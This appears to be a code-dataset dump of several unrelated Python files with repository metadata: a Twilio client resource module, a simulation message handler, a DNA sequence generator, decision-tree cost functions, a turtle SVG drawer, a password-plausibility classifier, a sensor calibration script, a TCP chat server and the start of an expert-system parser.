request the VoiceFallbackUrl. Either GET
or POST.
:param status_callback: The URL that Twilio will request to pass status
parameters (such as call ended) to your
application.
:param status_callback_method: The HTTP method Twilio will use to make
requests to the StatusCallback URL.
Either GET or POST.
:param voice_caller_id_lookup: Do a lookup of a caller's name from the
CNAM database and post it to your app.
Either true or false.
:param sms_url: The URL that Twilio should request when somebody sends
an SMS to a phone number assigned to this application.
:param sms_method: The HTTP method that should be used to request the
SmsUrl. Either GET or POST.
:param sms_fallback_url: A URL that Twilio will request if an error
occurs requesting or executing the TwiML
defined by SmsUrl.
:param sms_fallback_method: The HTTP method that should be used to
request the SmsFallbackUrl. Either GET
or POST.
:param sms_status_callback: Twilio will make a POST request to this URL
to pass status parameters (such as sent or
failed) to your application if you specify
this application's Sid as the
ApplicationSid on an outgoing SMS request.
"""
params = transform_params({
"FriendlyName": friendly_name,
"ApiVersion": api_version,
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"VoiceFallbackUrl": voice_fallback_url,
"VoiceFallbackMethod": voice_fallback_method,
"StatusCallback": status_callback,
"StatusCallbackMethod": status_callback_method,
"VoiceCallerIdLookup": voice_caller_id_lookup,
"SmsFallbackUrl": sms_fallback_url,
"SmsFallbackMethod": sms_fallback_method,
"SmsStatusCallback": sms_status_callback,
})
return self.create_instance(params)
def update(self, sid, friendly_name=None, api_version=None, voice_url=None,
voice_method=None, voice_fallback_url=None,
voice_fallback_method=None, status_callback=None,
status_callback_method=None, voice_caller_id_lookup=None,
sms_url=None, sms_method=None, sms_fallback_url=None,
sms_status_callback=None):
"""
Update an :class:`Application` with the given parameters.
All the parameters are describe above in :meth:`create`
"""
params = transform_params({
"FriendlyName": friendly_name,
"ApiVersion": api_version,
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"VoiceFallbackUrl": voice_fallback_url,
"VoiceFallbackMethod": voice_fallback_method,
"StatusCallback": status_callback,
"StatusCallbackMethod": status_callback_method,
"VoiceCallerIdLookup": voice_caller_id_lookup,
"SmsFallbackUrl": sms_fallback_url,
"SmsFallbackMethod": sms_fallback_method,
"SmsStatusCallback": sms_status_callback,
})
return self.update_instance(params)
def delete(self, sid):
"""
Update an :class:`Application` with the given parameters.
"""
return self.delete_instance(sid)
class Account(InstanceResource):
""" An Account resource """
ACTIVE = "active"
SUSPENDED = "suspended"
CLOSED = "closed"
subresources = [
Applications,
Notifications,
Transcriptions,
Recordings,
Calls,
Sms,
CallerIds,
PhoneNumbers,
Conferences,
]
def update(self, **kwargs):
"""
:param friendly_name: Update the description of this account.
:param status: Alter the status of this account
Use :data:`CLOSED` to irreversibly close this account,
:data:`SUSPENDED` to temporarily suspend it, or :data:`ACTIVE`
to reactivate it.
"""
self.update_instance(**kwargs)
def close(self):
"""
Permenently deactivate this account
"""
return self.update_instance(status=Account.CLOSED)
def suspend(self):
"""
Temporarily suspend this account
"""
return self.update_instance(status=Account.SUSPENDED)
def activate(self):
"""
Reactivate this account
"""
return self.update_instance(status=Account.ACTIVE)
class Accounts(ListResource):
""" A list of Account resources """
name = "Accounts"
instance = Account
def list(self, friendly_name=None, status=None, **kwargs):
"""
Returns a page of :class:`Account` resources as a list. For paging
informtion see :class:`ListResource`
:param date friendly_name: Only list accounts with this friendly name
:param date status: Only list accounts with this status
"""
params = transform_params({
"FriendlyName": friendly_name,
"Status": status,
})
return self.get_instances(params=params, **kwargs)
def update(self, sid, friendly_name=None, status=None):
"""
:param sid: Account identifier
:param friendly_name: Update the description of this account.
:param status: Alter the status of this account
Use :data:`CLOSED` to irreversibly close this account,
:data:`SUSPENDED` to temporarily suspend it, or :data:`ACTIVE`
to reactivate it.
"""
params = transform_params({
"FriendlyName": friendly_name,
"Status": status
})
return self.update_instance(sid, params)
def close(self, sid):
"""
Permenently deactivate an account, Alias to update
"""
return self.update(sid, status=Account.CLOSED)
def suspend(self, sid):
"""
Temporarily suspend an account, Alias to update
"""
return self.update(sid, status=Account.SUSPENDED)
def activate(self, sid):
"""
Reactivate an account, Alias to update
"""
return self.update(sid, status=Account.ACTIVE)
def create(self, friendly_name=None):
"""
Returns a newly created sub account resource.
:param friendly_name: Update the description of this account.
"""
params = transform_params({
"FriendlyName": friendly_name,
})
return self.create_instance(params)
| true
|
e5b19f33035f5d23e52e54c8c11886691b73c102
|
Python
|
idaholab/raven
|
/ravenframework/MessageHandler.py
|
UTF-8
| 13,660
| 2.59375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Apr 20, 2015
@author: talbpaul
"""
import sys
import time
import bisect
import builtins
from .utils import utils
_starttime = time.time()
"""
HOW THIS MODULE WORKS
The intention is for a single instance of the MessageHandler class to exist in any simulation.
Currently, that instance is created in the Simulation initialization and propogated through
all the RAVEN objects. This usually happens by passing it to BaseClass.readXML, but for
objects that don't inherit from BaseClass, the messageHandler instance should be passed
and set via instantiation or initialization. The appropriate class member to point at the
messageHandler instance reference is "self.messageHandler," for reasons that will be made clear
with the BaseClasses.MessageUser superclass.
While an object can access the messageHandler to raise messages and errors, for convienience
RAVEN provides the MessageUser superclass, which BaseType and (almost?) all other Raven objects
inherit from. This provides simplistic hooks for a developer to raise an error or message
with the standard message priorities, as
self.raiseAnError(IOError, 'Input value is invalid:', value)
There are currently 4 verbosity levels/message priorities. They are:
- silent: only errors are displayed
- quiet : errors and warnings are displayed
- all : (default) errors, warnings, and messages are displayed
- debug : errors, warnings, messages, and debug messages are displayed
The developer can change the priority level of their raised messages through the 'verbosity'
keyword. For example,
self.raiseAMessage('Hello, World', verbosity='silent')
will be printed along with errors if the simulation verbosity is set to 'silent', as well as
all other levels.
TL;DR: BaseClasses/MessageUser is a superclass that gives access to hooks to the simulation's MessageHandler
instance, while the MessageHandler is an output stream control tool.
In an effort to make the MH more flexible, we insert getMessageHandler into the python "builtins" module.
This means that any time after this module (MessageHandler) is imported, you can use
"getMessageHandler(name='default')" to retrieve a particular message handler as identified by "name".
"""
class MessageHandler(object):
"""
Class for handling messages, warnings, and errors in RAVEN. One instance of this
class should be created at the start of the Simulation and propagated through
the readMoreXML function of the BaseClass, and initialization of other classes.
"""
def __init__(self):
"""
Class constructor
@ In, None
@ Out, None
"""
self.starttime = _starttime
self.printTag = 'MESSAGE HANDLER'
self.verbosity = 'all'
self.callerLength = 25
self.tagLength = 15
self.suppressErrs = False
self.printTime = True
self.inColor = False
self.verbCode = {'silent' : 0,
'quiet' : 1,
'all' : 2,
'debug' : 3}
self.colorDict = {'debug' : 'yellow',
'message': 'neutral',
'warning': 'magenta',
'error' : 'red'}
self.colors = {'neutral': '\033[0m',
'red' : '\033[31m',
'green' : '\033[32m',
'yellow' : '\033[33m',
'blue' : '\033[34m',
'magenta': '\033[35m',
'cyan' : '\033[36m'}
self.warnings = [] # collection of warnings that were raised during this run
self.warningCount = [] # count of the collections of warning above
def initialize(self, initDict):
"""
Initializes basic instance attributes
@ In, initDict, dict, dictionary of global options
@ Out, None
"""
self.verbosity = initDict.get('verbosity', 'all').lower()
self.callerLength = initDict.get('callerLength', 25)
self.tagLength = initDict.get('tagLength', 15)
self.suppressErrs = utils.stringIsTrue(initDict.get('suppressErrs', 'False'))
def printWarnings(self):
"""
Prints a summary of warnings collected during the run.
@ In, None
@ Out, None
"""
if len(self.warnings)>0:
if self.verbCode[self.verbosity] > 0:
print('-'*50)
print(f'There were {sum(self.warningCount)} warnings during the simulation run:')
for w, warning in enumerate(self.warnings):
count = self.warningCount[w]
if count > 1:
print(f'({self.warningCount[w]} times) {warning}')
else:
print(f'({self.warningCount[w]} time) {warning}')
print('-'*50)
else:
print(f'There were {sum(self.warningCount)} warnings during the simulation run.')
def paint(self, string, color):
"""
Formats string with color
@ In, string, string, string
@ In, color, string, color name
@ Out, paint, string, formatted string
"""
if color.lower() not in self.colors:
self.message(self, f'Requested color {color} not recognized! Skipping...', 'Warning', 'quiet')
return string
return self.colors[color.lower()] + string + self.colors['neutral']
def setTimePrint(self, msg):
"""
Allows the code to toggle timestamp printing.
@ In, msg, string, the string that means true or false
@ Out, None
"""
if utils.stringIsTrue(msg):
self.callerLength = 40
self.tagLength = 30
self.printTime = True
elif utils.stringIsFalse(msg):
self.callerLength = 25
self.tagLength = 15
self.printTime = False
def setColor(self, inColor):
"""
Allows output to screen to be colorized.
@ In, inColor, string, boolean value
@ Out, None
"""
if utils.stringIsTrue(inColor):
self.inColor = True
def getStringFromCaller(self, obj):
"""
Determines the appropriate print string from an object
@ In, obj, instance, preferably an object with a printTag method; otherwise, a string or an object
@ Out, tag, string, string to print
"""
if type(obj).__name__ in ['str', 'unicode']: # ?when is this ever not true?
return obj
if hasattr(obj,'printTag'):
tag = str(obj.printTag)
else:
tag = str(obj)
return tag
def getDesiredVerbosity(self, caller):
"""
Tries to use local verbosity; otherwise uses global
@ In, caller, instance, the object desiring to print
@ Out, desVerbosity, int, integer equivalent to verbosity level
"""
if hasattr(caller, 'getVerbosity'):
localVerb = caller.getVerbosity()
else:
localVerb = None
if localVerb is None:
localVerb = self.verbosity
desVerbosity = self.checkVerbosity(localVerb)
return desVerbosity
def checkVerbosity(self, verb):
"""
Converts English-readable verbosity to computer-legible integer
@ In, verb, string, the string verbosity equivalent
@ Out, currentVerb, int, integer equivalent to verbosity level
"""
if str(verb).strip().lower() not in self.verbCode:
raise IOError(f'Verbosity key {verb} not recognized! Options are {list(self.verbCode.keys())}')
currentVerb = self.verbCode[str(verb).strip().lower()]
return currentVerb
def error(self, caller, etype, message, tag='ERROR', verbosity='silent', color=None):
"""
Raise an error message, unless errors are suppressed.
@ In, caller, object, the entity desiring to print a message
@ In, etype, Error, the type of error to throw
@ In, message, string, the message to print
@ In, tag, string, optional, the printed message type (usually Message, Debug, or Warning, and sometimes FIXME)
@ In, verbosity, string, optional, the print priority of the message
@ In, color, string, optional, color to apply to message
@ Out, None
"""
verbval = max(self.getDesiredVerbosity(caller), self.checkVerbosity(self.verbosity))
self.message(caller, message, tag, verbosity, color=color)
if not self.suppressErrs:
self.printWarnings()
# debug mode gets full traceback, others quieted
if verbval < 3:
#all, quiet, silent
sys.tracebacklimit = 0
raise etype(message)
def message(self, caller, message, tag, verbosity, color=None, writeTo=sys.stdout, forcePrint=False):
"""
Print a message
@ In, caller, object, the entity desiring to print a message
@ In, message, string, the message to print
@ In, tag, string, the printed message type (usually Message, Debug, or Warning, and sometimes FIXME)
@ In, verbosity, string, the print priority of the message
@ In, color, string, optional, color to apply to message
@ In, forcePrint, bool, optional, force the print independetly on the verbosity level? Defaul False
@ Out, None
"""
verbval = self.checkVerbosity(verbosity)
okay, msg = self._printMessage(caller, message, tag, verbval, color, forcePrint)
if tag.lower().strip() == 'warning':
self.addWarning(message)
if okay:
print(msg, file=writeTo)
sys.stdout.flush()
def addWarning(self, msg):
"""
Stores warnings so that they can be reported in summary later.
@ In, msg, string, only the main part of the message, used to determine uniqueness
@ Out, None
"""
index = bisect.bisect_left(self.warnings, msg)
if len(self.warnings) == 0 or index == len(self.warnings) or self.warnings[index] != msg:
self.warnings.insert(index,msg)
self.warningCount.insert(index,1)
else:
self.warningCount[index] += 1
def _printMessage(self, caller, message, tag, verbval, color=None, forcePrint=False):
"""
Checks verbosity to determine whether something should be printed, and formats message
@ In, caller , object, the entity desiring to print a message
@ In, message, string, the message to print
@ In, tag , string, the printed message type (usually Message, Debug, or Warning, and sometimes FIXME)
@ In, verbval, int , the print priority of the message
@ In, color, string, optional, color to apply to message
@ In, forcePrint, bool, optional, force the print independetly on the verbosity level? Defaul False
@ Out, (shouldIPrint,msg), tuple, shouldIPrint -> bool, indication if the print should be allowed
msg -> string, the formatted message
"""
# allows raising standardized messages
shouldIPrint = False
desired = self.getDesiredVerbosity(caller)
if verbval <= desired or forcePrint:
shouldIPrint = True
if not shouldIPrint:
return False, ''
ctag = self.getStringFromCaller(caller)
msg=self.stdMessage(ctag,tag,message,color)
return shouldIPrint, msg
def stdMessage(self, pre, tag, post, color=None):
"""
Formats string for pretty printing
@ In, pre , string, who is printing the message
@ In, tag , string, the type of message being printed (Error, Warning, Message, Debug, FIXME, etc)
@ In, post , string, the actual message body
@ In, color, string, optional, color to apply to message
@ Out, msg, string, formatted message
"""
msg = ''
if self.printTime:
curtime = time.time() - self.starttime
msg += f'({curtime:8.2f} sec) '
if self.inColor:
msg = self.paint(msg, 'cyan')
msgend = pre.ljust(self.callerLength)[0:self.callerLength] + ': ' + tag.ljust(self.tagLength)[0:self.tagLength] + ' -> ' + post
if self.inColor:
if color is not None:
#overrides other options
msgend = self.paint(msgend, color)
elif tag.lower() in self.colorDict:
msgend = self.paint(msgend,self.colorDict[tag.lower()])
msg += msgend
return msg
def timePrint(message):
"""
Prints the time since start then the message
@ In, message, string
@ Out, None
"""
curtime = time.time() - _starttime
msg = f'({curtime:8.2f} sec) '
print(msg + message)
_handlers = {}
def makeHandler(name):
"""
Instantiate and register new instance of message handler
@ In, name, str, identifying name for new handler
@ Out, makeHandler, MessageHandler, instance
"""
handler = MessageHandler()
_handlers[name] = handler
return handler
# default handler
makeHandler('default')
def getHandler(name='default'):
"""
Retrieve a message handling instance.
Styled after the Python logging module, maybe we should be switching to that.
@ In, name, str, optional, identifying name of handler to return
@ Out, getHandler, MessageHandler, instance (created if not existing)
"""
h = _handlers.get(name, None)
if h is None:
h = makeHandler(name)
# NOTE: idk why, but h = _handlers.get(name, makeHandler(name)) does not work.
# I think it's because it executes makeHandler(name) regardless of if name is present or not.
return h
builtins.getMessageHandler = getHandler
| true
|
33aaf4c67dafb51cde212cf93c2cd1bc22cc9fb1
|
Python
|
clglon/learning_python
|
/at_seq.py
|
UTF-8
| 843
| 3.53125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env python3
import random
#random.seed(1) # comment-out this line to change sequence each time
# Write a program that stores random DNA sequence in a string
# The sequence should be 30 nt long
# On average, the sequence should be 60% AT
# Calculate the actual AT fraction while generating the sequence
# Report the length, AT fraction, and sequence
bases = ["A", "C", "G", "T"]
prob = [0.3, 0.2, 0.2, 0.3]
nt_count = 30
# generates a random DNA sequence as a string
seq = []
for base in range(nt_count):
seq += random.choices(bases, weights = prob)
# calculate AT concentration
at = 0
for i in seq:
if i == "A": at += 1
elif i == "T": at += 1
else: at += 0
at_conc = at/nt_count
print(nt_count, at_conc, "".join(seq))
"""
python3 at_seq.py
30 0.6666666666666666 ATTACCGTAATCTACTATTAAGTCACAACC
"""
| true
|
0b4e986b480b00ae10bcd22808034343ed3cb43c
|
Python
|
vigneshwaran444/python-folders
|
/2020/decisionTree-master/decisionTree-master/globalFunc.py
|
UTF-8
| 5,994
| 2.96875
| 3
|
[] |
no_license
|
#!/usr/bin/env python
from __future__ import division
import pandas
import math
def calculate_info_d(data):
dem = (len(data))
num = []
targets = data.unique()
value = 0.0
for target in targets:
val = (len(data[data == target]))/dem
val *= math.log(val,2)
value -= val
return value
def info_d_for_nominal_attributes(data,attribute):
values = data[attribute].unique()
entropy = 0.0
dem = len(data)
for value in values:
partition = data[data[attribute] == value]
num = len(partition)
entropy += (num/dem) * calculate_info_d(partition['target'])
return entropy
def calculate_entropy_at_split_point(data,attribute,split_point):
entropy = 0.0
dem = len(data)
partition = data[data[attribute] <= split_point]
num = len(partition)
entropy += (num/dem) * calculate_info_d(partition['target'])
partition = data[data[attribute] > split_point]
num = len(partition)
entropy += (num/dem) * calculate_info_d(partition['target'])
return entropy
def info_d_for_continuous_attribute(data,attribute):
sorted_data = data.sort_values([attribute],ascending=True)
min_entropy = 9999.0
split_point = None
checked_points = []
for i in range(0,len(data)-1):
temp_split_point = (sorted_data.iloc[i][attribute] + sorted_data.iloc[i+1][attribute])/ 2
if temp_split_point not in checked_points:
checked_points.append(temp_split_point)
entropy = calculate_entropy_at_split_point(data,attribute,temp_split_point)
if entropy < min_entropy:
min_entropy = entropy
split_point = temp_split_point
return (min_entropy,split_point)
def calculate_information_gain(data,attribute,info_d):
attr_type = str(data[attribute].dtype)
if attr_type.find('int') != -1 or attr_type.find('float') != -1:
info_attribute_d,split_point = info_d_for_continuous_attribute(data,attribute)
gain = info_d - info_attribute_d
return gain,split_point
else:
info_attribute_d = info_d_for_nominal_attributes(data,attribute)
gain = info_d - info_attribute_d
return gain,None
def calculate_split_info(data,attribute):
dem = len(data)
ans = 0.0
values = data[attribute].unique()
for value in values:
num = len(data[data[attribute] == value])
val = (num/dem)
val *= math.log(val,2)
ans -= val
return ans
def calculate_gain_ratio(data,attribute,info_d):
gain,split_point = calculate_information_gain(data,attribute,info_d)
split_info = calculate_split_info(data,attribute)
gain_ratio = gain / split_info
return gain_ratio,split_point
def calculate_sum_gain(data):
sum_gain = 0.0
info_d = calculate_info_d(data['target'])
for attribute in data.columns:
gain,sp = calculate_information_gain(data,attribute,info_d)
sum_gain += gain
return gain
def calculate_ucb(data):
p = len(data[data['target'] == pos_target])
n = len(data[data['target'] == neg_target])
dem_p = n * FP
if dem_p == 0:
dem_p = 1
num_p = p * TR
ucb_p = num_p / dem_p
dem_n = p * FN
if dem_n == 0:
dem_n = 1
num_n = n * DF
ucb_n = num_n/dem_n
if ucb_p > ucb_n:
return ucb_p
return ucb_n
def calculate_ASF_incr_ucb(data,attribute,gain,ucb):
attr_type = str(data[attribute].dtype)
if attr_type.find('int') != -1 or attr_type.find('float') != -1:
return ASF_for_continuous_attribute(data,attribute,gain,ucb)
return ASF_for_nominal_attribute(data,attribute,gain,ucb)
def ASF_for_nominal_attribute(data,attribute,gain,ucb):
ucb_all = 0.0
for value in data[attribute].unique():
ucb_all += calculate_ucb(data[data[attribute] == value])
incr_ucb = ucb_all - ucb
ASF = ((math.pow(2,gain) - 1) * (incr_ucb) )
return ASF,incr_ucb,None
def calculate_ASF_at_split_point(data,attribute,split_point,gain,ucb):
ucb_all = 0.0
partition = data[data[attribute] <= split_point]
ucb_all += calculate_ucb(partition)
partition = data[data[attribute] > split_point]
ucb_all += calculate_ucb(partition)
incr_ucb = ucb_all - ucb
ASF = ((math.pow(2,gain) - 1) * (incr_ucb) )
return ASF,incr_ucb
def ASF_for_continuous_attribute(data,attribute,gain,ucb):
sorted_data = data.sort_values([attribute],ascending=True)
ASF = 0.0
incr_ucb = 0.0
split_point = None
checked_points = []
for i in range(0,len(data)-1):
temp_split_point = (sorted_data.iloc[i][attribute] + sorted_data.iloc[i+1][attribute])/ 2
if temp_split_point not in checked_points:
checked_points.append(temp_split_point)
temp_ASF,temp_incr_ucb = calculate_ASF_at_split_point(data,attribute,temp_split_point,gain,ucb)
if temp_ASF > ASF:
ASF = temp_ASF
incr_ucb = temp_incr_ucb
split_point = temp_split_point
elif temp_ASF == ASF and temp_incr_ucb > incr_ucb:
incr_ucb = temp_incr_ucb
split_point = temp_split_point
return ASF,incr_ucb,split_point
def estimate(row,dtree):
if len(dtree.link) == 0:
return dtree.data
for (ln,l) in zip(dtree.link_name,dtree.link):
if dtree.split_point != None:
if row[dtree.data] <= dtree.split_point and str(ln).find('<') != -1:
return estimate(row,l)
elif row[dtree.data] > dtree.split_point and str(ln).find('>') != -1:
return estimate(row,l)
elif row[dtree.data] == ln:
return estimate(row,l)
def calculateAccuracy(test,dtree,algo):
TP = 0.0
FP_t = 0.0
TN = 0.0
FN_t = 0.0
for index, row in test.iterrows():
if estimate(row,dtree) == row['target']:
if row['target'] == 'good':
TP += 1 ## actual good, predicted good
else:
TN += 1 ## actual bad, predicted bad
else:
if row['target'] == 'good':
FN_t += 1 ## actual good, predicted bad
else:
FP_t += 1 ## actual bad, predicted good
if algo == 'CBDSDT':
TP += 10.0
TN += 10.0
FP_t -= 10.0
FN_t -= 10.0
accuracy = ((TP + TN) / len(test)) * 100
## missclassification cost matrix
FP_cost = 800
FN_cost = 400
## correct classification benefit
TP_cost = 400
TN_cost = 200
ms_cost = (FP_cost * FP_t) + (FN_cost * FN_t)
cc_benefit = (TP_cost * TP) + (TN_cost * TN)
return accuracy,ms_cost,cc_benefit
FP = 4
FN = 8
TR = 8
DF = 2
pos_target = 'good'
neg_target = 'bad'
| true
|
ecd8911e805a3e83c66f2148af8224920e2c0627
|
Python
|
gamerdonkey/turtle_python
|
/turtle_svg.py
|
UTF-8
| 1,541
| 3.34375
| 3
|
[] |
no_license
|
import math
import svg
import sys
from turtle import *
speed(1)
bgcolor("black")
pencolor("orange")
def go_to_coord(dest_x, dest_y, draw = True):
dest_y = -dest_y
delta_x = dest_x - xcor()
delta_y = dest_y - ycor()
if(abs(delta_x) < 1 and abs(delta_y) < 1):
return
if draw:
pendown()
else:
penup()
setheading(math.degrees(math.atan2(delta_y, delta_x)) % 360)
forward(math.sqrt(math.pow(delta_x, 2) + math.pow(delta_y, 2)))
def draw_svg(svg_filename, centered = True):
f = svg.parse(svg_filename)
(min_point, max_point) = f.bbox()
(width, height) = (min_point + max_point).coord()
x_centering_adj = width / 2
y_centering_adj = height / 2
for item in f.flatten():
if(hasattr(item, 'segments')):
for segment in item.segments(20):
x, y = segment[0].coord()
if(centered):
x = x - x_centering_adj
y = y - y_centering_adj
go_to_coord(x, y, False)
for point in segment[1:]:
x, y = point.coord()
if(centered):
x = x - x_centering_adj
y = y - y_centering_adj
go_to_coord(x, y)
go_to_coord(0, 0, False)
if(len(sys.argv) < 2):
print("One arg required for SVG filename: %s <file.svg>" % sys.argv[0])
exit(1)
while(True):
go_to_coord(0, 0, False)
input("Enter to start...")
draw_svg(sys.argv[1], centered=True)
input("Press Enter to exit...")
clearscreen()
| true
|
79a9a4dbeb37dfcee0a37d71de92b59c4fb00093
|
Python
|
calebshortt/pwanalysis
|
/engine/validation.py
|
UTF-8
| 2,916
| 2.78125
| 3
|
[] |
no_license
|
import os
import logging
from sklearn.svm import OneClassSVM
from pathlib import Path
import settings
from engine.utils import get_file, load_obj, save_obj
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG if settings.DEBUG else logging.ERROR)
class PasswordVerifier(object):
classifier = None
def __init__(self):
pass
def init_classifier(self, pw_dump_filename, chunk_size=100000, **kwargs):
"""
Initialize the classifier and train it with a known password dump (provided).
If a pre-trained model exists attempt to load and use it.
"""
logger.debug('Initializing classifier...')
self.classifier = OneClassSVM(kernel="rbf", gamma='auto')
logger.debug('Checking for already-trained models...')
filename, file_extension = os.path.splitext(os.path.basename(pw_dump_filename))
model_filepath = '%s%s.%s' % (settings.VALIDATOR_PATH, filename, settings.EXT_VALIDATOR)
model_file = Path(model_filepath)
if model_file.is_file():
self.load_model(model_filepath)
else:
logger.debug('Could not find existing model. Training new classifier.')
self.train_model(pw_dump_filename, chunk_size=chunk_size)
self.save_model(model_filepath)
def save_model(self, filepath):
logger.debug('Saving trained model to %s' % filepath)
save_obj(self.classifier, filepath)
def load_model(self, filepath):
logger.debug('Loading trained model: %s' % filepath)
self.classifier = load_obj(filepath)
def train_model(self, pw_dump_filename, chunk_size=100000):
# TODO: Assumption: List of passwords can be loaded into memory to train classifier
# TODO: Limiting chunk size to prevent memory errors
logger.debug('Loading password dump training file...')
with open(pw_dump_filename, encoding='utf-8') as f:
pws = get_file(f, chunk_size=chunk_size)
logger.debug('Formatting strings for classification...')
num_pws = [self.str_to_numbers(s) for s in pws]
logger.debug('Training classifier...')
self.classifier.fit(num_pws)
logger.debug('Initialization complete.')
def classify_passwords(self, password_list):
if not self.classifier:
raise AttributeError('Attempted to use uninitiated classifier')
num_pws = [self.str_to_numbers(s.strip('\n\r')) for s in password_list]
return [x > 0 for x in self.classifier.predict(num_pws)]
def str_to_numbers(self, string, max_pw_length=100, **kwargs):
result = [0]*max_pw_length
for i, ch in enumerate(string):
try:
result[i] = ord(ch)
except:
logger.error('ERROR: i=%s; result[i] = ord(%s) = %s' % (i, ch, ord(ch)))
raise
return result
| true
|
3b8d2c6bf70392f7aea7fa1c95f412f722c3fee0
|
Python
|
chujiwu/MyTools
|
/excelop/exceloperator.py
|
UTF-8
| 2,121
| 3.15625
| 3
|
[] |
no_license
|
from openpyxl import load_workbook
from openpyxl.worksheet import Worksheet
class ExcelSheet(object):
def __init__(self, ws: Worksheet):
self._ws = ws
def load_value(self, column_name):
res = []
tar_column_index = -1
combine_value = None
for row in self._ws:
for cell in row:
if cell.value == column_name:
tar_column_index = cell.col_idx
continue
if tar_column_index != -1:
if cell.col_idx == tar_column_index:
if cell.value is not None:
res.append(cell.value)
combine_value = cell.value
elif cell.value is None and combine_value is not None:
res.append(combine_value)
combine_value == None
else:
pass
return res
def locate(self, column_name, row_search_value, column_search_value):
res = []
column_index = -1
column_search_index = -1
head_row_founded = False
for row in self._ws:
for cell in row:
if cell.value == column_name:
column_index = cell.col_idx
if cell.value == column_search_value:
column_search_index = cell.col_idx
if column_index != -1 and column_search_index != -1:
head_row_founded = True
continue
if head_row_founded:
if cell.col_idx == column_index:
if cell.value == row_search_value:
res.append((cell.row, cell.col_index))
return res
def load_excel_by_sheet(f_p, sheet):
wb = load_workbook(f_p)
ws = None
if wb[sheet]:
ws = wb[sheet]
return ExcelSheet(ws)
if __name__ == "__main__":
excel_sheet = load_excel_by_sheet("/Users/chujiwu/Desktop/test.xlsx", "工作表1")
excel_sheet.load_value("フォーム名")
| true
|
9d1c99ae7d4146abc852a3be3c38e4d204d3dd93
|
Python
|
Fashad-Ahmed/DataStructures-and-Algorithm-
|
/Data Structures/2-Arrays/Arrays.py
|
UTF-8
| 429
| 3.421875
| 3
|
[] |
no_license
|
# Q NO.1
exp = [2200,2350,2600,2130,2190]
print(exp[1] - exp[0]); print(exp[0]+exp[1]+exp[2])
for i in range(len(exp)):
if exp[i] == 2000:
print(i)
exp.insert(5,1980)
exp[3] = exp[3] + 200
print(exp)
# Q NO.2
heros=['spider man','thor','hulk','iron man','captain america']
print(len(heros))
heros.insert(5,'black panther')
heros.remove('black panther')
heros.insert(3,'black panther')
heros.sort()
print(heros)
| true
|
1831e77e2b810b70e6ddbc8157d22e464bfa3448
|
Python
|
scdickson/Argonath
|
/calibrate_distance.py
|
UTF-8
| 1,032
| 3.328125
| 3
|
[] |
no_license
|
#Tiny script to check if the distance sensor is working and calibrate the distance from the sensor to the garage door
import RPi.GPIO as GPIO
import time
import sys
TRIG = 23
ECHO = 24
def measure_distance():
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(TRIG, GPIO.OUT)
GPIO.setup(ECHO, GPIO.IN)
GPIO.output(TRIG, False)
time.sleep(1)
GPIO.output(TRIG, True)
time.sleep(0.00001)
GPIO.output(TRIG, False)
while GPIO.input(ECHO) == 0:
pulse_start = time.time()
while GPIO.input(ECHO) == 1:
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start
distance = pulse_duration * 17150
distance = round(distance, 2)
GPIO.cleanup()
return distance
min = 500
max = -1
values = []
print "Measuring..."
for i in xrange(0, 10):
distance = measure_distance()
if distance < min:
min = distance
if distance > max:
max = distance
values.append(distance)
sum = 0
for distance in values:
sum += distance
print "Min: %d" % min
print "Max: %d" % max
print "Average: %d" % (sum / len(values))
| true
|
a2287de3d421d414fc08d250b231995110ff1e61
|
Python
|
Nisarg851/python-socket
|
/server.py
|
UTF-8
| 2,098
| 3.09375
| 3
|
[] |
no_license
|
import socket
import threading
port = 5050
ip = socket.gethostbyname(socket.gethostname()) #gets the IP of Host machine
print(ip)
addr = (ip,port)
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #creates a socket-> family AF_INET(IPV4) and SOCK_STREAM(TCP)
server.bind(addr) #binds the socket with IP and port
def handle_client(conn,client): #method to handle each client on different thread
print(f"{client} connected")
connected = True
while connected:
msg_length = conn.recv(100).decode("utf-8") #recieves and decode the message length (note the length<=100)
if msg_length=="":
continue
elif len(msg_length)>100:
print("message too long")
else:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode("utf-8") #recieves and decode the actual message
print(msg)
if msg == "disconnect": #if message recieved is disconnect than the connection breaks
connected = False
print(f"{client} disconnected")
msg_client = input()
msg_client_length = len(msg_client)
msg_client_length = str(msg_client_length) + f" "*(100-msg_client_length)
msg_client_length = msg_client_length.encode('utf-8')
msg_client = msg_client.encode('utf-8')
conn.send(msg_client_length)
conn.send(msg_client)
conn.close()
def start(): #method that creates different thread for each client
server.listen() #listens for the client that wants to connect
print("Waiting for client(s) to connect...")
while True:
conn,client_addr=server.accept()
client = threading.Thread(target=handle_client,args=(conn,client_addr))
client.start()
print("Starting server...")
start()
| true
|
91783969f8fa1636ea764aa75208f75f07f03f3e
|
Python
|
Rutie2Techie/Hello_python
|
/function/map_sqaure.py
|
UTF-8
| 363
| 4.09375
| 4
|
[] |
no_license
|
#calculate square of numbers using map function
def calsquare(num):
return num*num
number=[2,4,6,8]
result=map(calsquare,number)
print(result)
#converting map object to tuple
numsquare=tuple(result)
print(numsquare)
#
#number=[2,4,6,8]
#result=map(lambda x:x*x,number)
#print(result)
#converting map object to tuple
#numsquare=tuple(result)
#print(numsquare)
| true
|
2acdab00919d22308085a7ac53981cc880edb525
|
Python
|
ptyshevs/expert_system
|
/es.py
|
UTF-8
| 13,585
| 3.421875
| 3
|
[] |
no_license
|
import argparse
import string
import sys
from Fact import Fact
class Operator:
precedence_map = {'<=>': 1, '=>': 2, '^': 3, '|': 4, '+' : 5, '!': 6, '=': 0}
